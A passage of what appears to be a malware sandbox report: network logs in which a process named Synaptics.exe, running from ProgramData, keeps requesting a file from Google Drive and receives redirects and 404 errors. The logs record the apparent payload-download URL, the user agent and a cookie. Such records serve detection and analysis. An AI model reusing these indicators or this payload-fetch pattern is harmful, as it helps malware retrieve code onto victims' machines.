                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5xbHscZhjUAC5j9kAMvQaUCXa-3yfOu7RaoYqljKYV8knjX56L1UvKEB0C5Fc9Tu4Pc4Tj0sg
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Z6jKdYZQNpTihdvOzfobAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 7a 56 71 34 58 69 64 4b 68 6b 75 54 4e 78 43 53 4c 68 37 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="ozVq4XidKhkuTNxCSLh7Ew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            65192.168.2.849819142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ckpieVmGDIy4SdRNgHWn3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            66192.168.2.849820142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC53D40FV8zy2Uy0FzXv9g0PLku9ZgXhSCoSOwYRHj6iQ0S7pzTcBVIUnucULY9BCseABGfGTAA
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-3a8-nsDvDMxdsNONszcB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 79 70 64 39 62 73 4c 79 67 64 6d 54 6b 36 55 54 6b 38 75 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="Pypd9bsLygdmTk6UTk8ubg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            67192.168.2.849821142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:29 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-QPr1IrBirxWeX7QfP5_CuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            68192.168.2.849825142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:30 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-p33st7Q40zNCGZcpsyV1HQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            69192.168.2.849826142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC67v4XwYxb7u-am1A_nmiXu2EM7sj2zO7nRCCeAz-dA7dtypUC-chXR4tOjjr5YEe6q1ODh6ZQ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-yj_i6Y5hG_eWK2l_ZPiUfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 68 67 71 44 46 71 51 38 44 79 74 69 70 4f 79 31 6d 47 63 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="OhgqDFqQ8DytipOy1mGchg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            70192.168.2.849827142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:30 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PQyn1dU4ez9CC8axpFuGnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            71192.168.2.849828142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
